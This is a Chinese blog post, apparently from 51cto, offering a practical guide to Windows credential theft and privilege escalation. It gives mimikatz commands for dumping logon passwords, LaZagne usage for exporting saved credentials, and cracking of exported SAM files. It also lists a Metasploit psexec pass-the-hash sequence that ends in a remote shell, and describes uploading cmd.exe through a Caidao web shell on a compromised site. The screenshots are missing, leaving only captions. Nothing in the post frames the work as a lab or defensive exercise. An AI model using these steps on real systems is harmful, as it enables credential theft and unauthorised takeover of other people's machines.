首页 > 系统相关 >windows提权(上)

windows提权(上)

时间:2023-08-26 23:32:06浏览次数:37  
标签:exe 密码 windows kali 提权 set 权限

windows提权(上)_新建用户

只能搞个阉割版,不放工具了。我这里分开成两个部分传

mimikatz读密码:

privilege::debug //提升权限

windows提权(上)_远程登录_02

sekurlsa::logonpassWords //抓取密码

windows提权(上)_linux_03

xp不支持而已,win7可以

laZagne.exe读取密码:

linux,windows都支持

windows提权(上)_新建用户_04

选项:

windows提权(上)_linux_05

效果:

windows提权(上)_新建用户_06

laZagne.exe all >>1.txt #导出结果

高版本2016,2012则可以读取hash,比如Pwdump7

彩虹表:

kali自带

windows提权(上)_新建用户_07

字典很大,速度很快,pojie纯数字很快:

windows提权(上)_新建用户_08

导出windows的SAM,system文件,导入kali,Crack  pojie。

kali的msf,利用hash远程登录系统:

针对无法读出的密码

要kali2.0,博主之前装失败了不再演示

msfconsole

msf > use exploit/windows/smb/psexec

msf > set rhost 192.168.1.105

msf > set SMBUser administrator

msf > set SMBPass #接工具读出来的hash

msf > exploit

msf > shell

windows权限提升:

我直接把文件拖进去

windows提权(上)_linux_09

用wt.asp看文件夹,文件读写的权限

windows提权(上)_linux_10

windows提权(上)_远程登录_11

因为:

windows提权(上)_linux_12

找到cmd.exe,拖出来:

windows提权(上)_linux_13

拖进菜刀:

windows提权(上)_linux_14

执行:setp c:\wmpub\cmd.exe

windows提权(上)_远程登录_15

阔以了:

windows提权(上)_linux_16

可以执行命令不能新建用户:

windows提权(上)_新建用户_17


标签:exe,密码,windows,kali,提权,set,权限
From: https://blog.51cto.com/u_16172166/7246645

相关文章

  • Windows线程API —CreateTimerQueueTimer/DeleteTimerQueueTimer的使用
    问题代码:1#include<windows.h>2#include<iostream>3#include<thread>4HANDLEh1;5HANDLEh2;67voidCALLBACKtest(PVOIDa,BOOLEANb)8{9std::cout<<"ThisatestfunctionexcutedbyThread:"<<......
  • Linux 相比 Windows 有何优势
    首先Linux属于专业系统,开源且大多免费(参注3),而Linux大多优势都来源于开源这个特性,但缺点也大多来源于此,因为开源所以可以任意添加与减少功能和代码,前提是你有能力这么做的话,而有能力从核心功能上进行添加或裁剪的公司全世界不多于100个(已经非常向多里说了,实际情况可能少于30个)。......
  • WebStorm2023 Windows激活教程(亲测有效)
    写在前面Webstorm目前已经更新到最新的2023.2版本了,许多小伙伴私聊问我,为啥之前2021.3.1的激活套路对新版本2023.2不管用了,是个什么情况?很显然,Webstorm官方发现了这种激活路数,新版本加入了更严厉的反制激活。所以说,小伙伴们激活成功了以后,尽量不要升级Webstorm,不然大......
  • windows 桌面GUI自动化- 18.pywinauto 保存控件菜单树结构print_control_identifiers(
    前言.pywinauto可以使用print_control_identifiers()方法打印控件菜单树结构,这对我们查找控件非常方便。print_control_identifiers()查看相关源码defprint_control_identifiers(self,depth=None,filename=None):"""Printsthe'identifiers'......
  • AppSpider Pro 7.4.054 for Windows - Web 应用程序安全测试
    AppSpiderPro7.4.054forWindows-Web应用程序安全测试Rapid7DynamicApplicationSecurityTesting(DAST)请访问原文链接:https://sysin.org/blog/appspider/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgappspider没有任何应用程序未经测试,没有未知风险......
  • Acunetix v23.7 (Linux, Windows) - 漏洞扫描 (Web 应用程序安全测试)
    Acunetixv23.7(Linux,Windows)-漏洞扫描(Web应用程序安全测试)Acunetix|WebApplicationSecurityScanner请访问原文链接:https://sysin.org/blog/acunetix-23/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org重要提示AcunetixPremium现在使用日历化版本......
  • Invicti v23.8 for Windows - 企业应用安全测试
    Invictiv23.8forWindows-企业应用安全测试InvictiStandard17Aug2023v23.8.0.41720请访问原文链接:https://sysin.org/blog/invicti/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgInvicti是一种自动化但完全可配置的Web应用程序安全扫描程序,使您能够扫......
  • HCL AppScan Standard v10.3.0 (Windows) - 应用程序安全测试
    HCLAppScanStandardv10.3.0(Windows)-应用程序安全测试请访问原文链接:https://sysin.org/blog/appscan-10/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgESG技术评论:使用HCLAppScan实现持续的应用程序安全“AppScan通过直接集成到软件开发生命周期来支......
  • Nexpose v6.6.213 for Linux & Windows - 漏洞扫描
    Nexposev6.6.213forLinux&Windows-漏洞扫描Rapid7VulnerabilityManagement,ReleaseAug23,2023请访问原文链接:https://sysin.org/blog/nexpose-6/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org您的本地漏洞扫描程序搜集通过实时覆盖整个网络,随......
  • Airtest新增iOS、Windows录屏功能,真香!
    1.前言在录屏这块,Airtest之前一直仅支持了Android设备,但Airtest1.2.9的新版录屏功能里,新增了iOS和Windows的录屏支持。下文我们将详细了解这个新的录屏功能,以及实操下在iOS设备或者Windows端的录屏操作。2.Airtest录屏功能介绍熟悉Airtest的同学都知道,我们可以用 start_rec......